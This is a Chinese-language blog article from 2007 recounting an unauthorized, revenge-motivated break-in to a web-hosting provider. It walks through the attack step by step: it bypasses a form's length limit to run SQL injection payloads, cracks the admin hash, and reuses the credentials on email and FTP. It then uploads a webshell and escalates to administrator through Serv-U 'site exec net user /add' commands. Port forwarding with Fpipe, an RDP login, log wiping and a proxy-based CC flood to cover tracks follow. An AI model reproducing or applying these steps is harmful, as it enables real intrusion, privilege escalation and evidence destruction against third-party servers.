快捷導(dǎo)航

從搜索參數(shù)過(guò)濾不嚴(yán)到IDC虛擬主機(jī)的滲透

更新時(shí)間：2007年01月16日 00:00:00 作者：

有天跟朋友談起B(yǎng)LOG備案的問(wèn)題，無(wú)意中提到了空間提供商IDC。說(shuō)起IDC，沒(méi)想到朋友還有段非常不愉快的經(jīng)歷。
事情是這樣的：當(dāng)時(shí)他也是沒(méi)經(jīng)驗(yàn)，想選個(gè)虛擬主機(jī)做網(wǎng)站，當(dāng)然出于習(xí)慣問(wèn)題，他對(duì)提供自己虛擬主機(jī)空間服務(wù)的這臺(tái)服務(wù)器做了下安全檢測(cè)，結(jié)果他拿到了空間提供商WEB目錄的權(quán)限，于是……小小地給自己加了一年的時(shí)間。沒(méi)想到被他空間提供商發(fā)現(xiàn)了，封閉了朋友的空間和FTP賬號(hào)。后來(lái)他看了下，這個(gè)空間商竟然連電子經(jīng)營(yíng)許可證(ICP證)都沒(méi)有！汗ing....
不過(guò)據(jù)說(shuō)后來(lái)那臺(tái)服務(wù)器增強(qiáng)了安全性，配置得還不錯(cuò)！既然你不僅不合法而且又得罪了偶那可愛(ài)得不能再可愛(ài)的朋友，那就免費(fèi)給你做次安全檢測(cè)吧！
廢話不多說(shuō)了，既然朋友認(rèn)為他的安全性還可以，那系統(tǒng)掃描這檔子事就根本沒(méi)必要做了，直接看WEB安全性！找啊找啊找朋友，找到一個(gè)好朋友……暈！主站安全性確實(shí)還說(shuō)得過(guò)去，過(guò)濾得很?chē)?yán)格！再用 Domain 3.0 看了下。
暈，那么多虛擬主機(jī)跟自己的站放在一起——真會(huì)賺錢(qián)?。『昧?，我們繼續(xù)。導(dǎo)入網(wǎng)址進(jìn)行路徑掃描，掃出幾個(gè)upfile.asp upload.asp，嘗試上傳，均告失敗(這不奇怪，畢竟是很老的洞洞了)。既然這個(gè)不行，我們?cè)倏?，告訴你我可是有的是耐心。
隨便從 Domain 3.0 左邊點(diǎn)了個(gè)站進(jìn)去，是個(gè)在線購(gòu)物站點(diǎn)，有ICP證！SORRY SORRY 我的目標(biāo)不是你，只是借個(gè)WebShell用用而已！費(fèi)了九牛二虎之力解釋清楚之后，開(kāi)始檢測(cè)了……
首先找BBS——發(fā)現(xiàn)沒(méi)有，不過(guò)倒是看到了個(gè)留言板，不錯(cuò)！就是你了，我們來(lái)看看。打開(kāi)大致看了下，這個(gè)留言板簡(jiǎn)單得不能再簡(jiǎn)單了，嘗試了幾個(gè)“and 1=1”、“and 1=2”沒(méi)發(fā)現(xiàn)問(wèn)題。暴數(shù)據(jù)庫(kù)路徑也別想了，這個(gè)BT IDC已經(jīng)全部做了錯(cuò)誤處理，返回定制頁(yè)，所以即使出錯(cuò)了也得不到有用信息(不過(guò)如果是MSSQL數(shù)據(jù)庫(kù)在注入點(diǎn)將有辦法解決這個(gè)問(wèn)題)！這時(shí)候，目光落到了“搜索留言”上。趕緊打開(kāi)，直覺(jué)告訴我這里有問(wèn)題。
前面看到了一個(gè)留言，關(guān)鍵詞是“人氣”，那我們先在搜索欄里搜索一下“人氣”，返回正常頁(yè)面。

接著當(dāng)我想構(gòu)造檢測(cè)語(yǔ)句的時(shí)候出了點(diǎn)小問(wèn)題，查詢框有字符長(zhǎng)度限制。不過(guò)這個(gè)小CASE! 我們把當(dāng)前頁(yè)面的源碼保存到本地，搜索Action找到如下語(yǔ)句：

原始代碼:
------------------------------------------------------------------------------------------
<FORM onsubmit="return check(this)" action=searchresult.asp method=post>
<TABLE class=lybtable height=64 cellSpacing=0 cellPadding=0 width=650
align=center>
<TBODY>
<TR>
<TD width="100%" height=64>
<DIV align=center><FONT color=#000000> <B> 查詢方式：</B> <SELECT size=1
name=classid> <OPTION selected>留言內(nèi)容</OPTION> <OPTION>回復(fù)內(nèi)容</OPTION>
<OPTION>姓名</OPTION></SELECT> 關(guān)鍵字： <INPUT maxLength=12 size=28
name=keyword> <INPUT class=noborder accessKey=s type=submit value=查詢(S) name=B1>

</FONT></DIV></TD></TR></TBODY></TABLE></FORM>
-----------------------------------------------------------------------------------------

我們這里需要改幾個(gè)地方，把“action=searchresult.asp”改成“action=http://www.xxx.com/lyb/searchresult.asp”(這里我隱藏了原始地址，為了保護(hù)自己也為了保護(hù)該站點(diǎn))，當(dāng)然啦，不能忘了改最重要的東西：“maxLength=12”改成 “maxLength=152”，修改后的代碼如下：
------------------------------------------------------------------------------------------
<FORM onsubmit="return check(this)" action=http://www.xxx.com/lyb/searchresult.asp
method=post>
<TABLE class=lybtable height=64 cellSpacing=0 cellPadding=0 width=650
align=center>
<TBODY>
<TR>
<TD width="100%" height=64>
<DIV align=center><FONT color=#000000> <B> 查詢方式：</B> <SELECT size=1
name=classid> <OPTION selected>留言內(nèi)容</OPTION> <OPTION>回復(fù)內(nèi)容</OPTION>
<OPTION>姓名</OPTION></SELECT> 關(guān)鍵字： <INPUT maxLength=152 size=28
name=keyword> <INPUT class=noborder accessKey=s type=submit value=查詢(S) name=B1>
</FONT></DIV></TD></TR></TBODY></TABLE></FORM>
------------------------------------------------------------------------------------------
好了，接下來(lái)我們就可以本地提交了！打開(kāi)修改后的頁(yè)面，在搜索欄里查詢：“人氣%' and 1=1 and '%'='”——返回正常頁(yè)面。
接著，我們嘗試查詢：“人氣%' and 1=2 and '%'='”——出錯(cuò)！果然有問(wèn)題。

好了，既然找到了突破口，我們繼續(xù)！手動(dòng)猜太累了，交給 NBSI 2吧。我們構(gòu)造如下 URL ：http://www.xxx.com/lyb/searchresult.asp?classid=留言內(nèi)容&keyword=人氣，在關(guān)鍵詞里輸入正常頁(yè)面里的一個(gè)詞，我這里選“2005”，好了，GO！一聲令下，NBSI 2飛快地運(yùn)行了，沒(méi)過(guò)多久，密碼出來(lái)了。暈，MD5加密的，不過(guò)不要緊，一下子就破解出來(lái)了。
不用掃路徑了，頁(yè)面上直接就有管理員登錄的鏈接，我們成功登錄！不過(guò)情況不太樂(lè)觀，后臺(tái)功能實(shí)在是簡(jiǎn)單得不能再簡(jiǎn)單了，嘗試獲得一個(gè)WebShell別說(shuō)還真不是件容易的事！思路一轉(zhuǎn)，掃購(gòu)物系統(tǒng)的后臺(tái)(本來(lái)還想跟留言板一樣直接找個(gè)管理員登錄的鏈接的，無(wú)奈找不到)！掃描結(jié)果很不幸，后臺(tái)路徑我們無(wú)從知道！到這里難道就沒(méi)辦法了？辦法不會(huì)沒(méi)有，而是你找不到罷了！我們注意到了這里。
管理員資料里包括郵件賬號(hào)，抱著試試看的態(tài)度，我嘗試著登錄該站管理員的郵箱——竟然成功！馬上退出，想到什么了？對(duì)，F(xiàn)TP賬號(hào)！用郵箱@前的賬號(hào)和前面我們破解出來(lái)的密碼成功連接上空間商的FTP！然后呢？當(dāng)然是上傳WebShell了！
馬上傳了個(gè)海洋2006網(wǎng)安中國(guó)zrrrshoo個(gè)人專(zhuān)用版，訪問(wèn)鏈接，沒(méi)被查殺，成功。粗略看了下目錄設(shè)置，標(biāo)準(zhǔn)的虛擬主機(jī)權(quán)限分配：每個(gè)空間獨(dú)立運(yùn)行，文件夾名為域名，不能遍歷其它站點(diǎn)目錄，CDE分區(qū)根目錄一概無(wú)權(quán)限瀏覽！隨手一個(gè)“net user”，不出所料，無(wú)法執(zhí)行！嘗試跳轉(zhuǎn)到“c:\winnt\system32\inetsrv\data\”，成功了！上傳一個(gè)改名了的cmd.exe，在海洋里指定路徑“c:\winnt\system32\inetsrv\data\cmd.exe /c”執(zhí)行命令—成功！“net start”，再次不出所料，服務(wù)器里果然有個(gè)Serv-U乖乖躺在那里，等著給我們提升權(quán)限。不過(guò)先別樂(lè)觀，沒(méi)成功之前什么都不確定！“netstat -an”：印入眼簾的包括一個(gè)“43958”，看來(lái)沒(méi)想象中的復(fù)雜！接著目錄跳轉(zhuǎn)至“C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\”找到Serv-U目錄，進(jìn)去下載快捷方式回來(lái)！知道了他的Serv-U安裝路徑：“D:\serv-U\”，看看能不能跳轉(zhuǎn)進(jìn)入—成功！又是老套路，寫(xiě)入新用戶到“ServUDaemon.ini”準(zhǔn)備走人的時(shí)候，竟然提示出錯(cuò)了！郁悶，看來(lái)是沒(méi)有寫(xiě)權(quán)限……
不過(guò)一件令人大跌眼鏡的事情發(fā)生了，本來(lái)以為應(yīng)該有防火墻過(guò)濾除少數(shù)幾個(gè)外的所有端口的，沒(méi)想到上傳 Fpipe后，轉(zhuǎn)發(fā)的高端口能直接連接上，那還說(shuō)什么，本地新建FTP域，遠(yuǎn)程連接管理，加用戶，F(xiàn)TP上去“quote site exec net user zrrrshoo /add”；“quote site exec net user zrrrshoo zrrr”；“quote site exec net localgroup administrators zrrrshoo /add”，他有3389，我怕又做了登錄限制，不過(guò)事實(shí)證明我的擔(dān)心是多余的！直接就登錄進(jìn)去了。好了，安全要緊，清除所有日志，再開(kāi)個(gè)ChallengeCollapsar，用30個(gè)代理變換路徑訪問(wèn)15分鐘(主要是不讓W(xué)EB日志空空如也)，OK！明天把他交給朋友處理吧！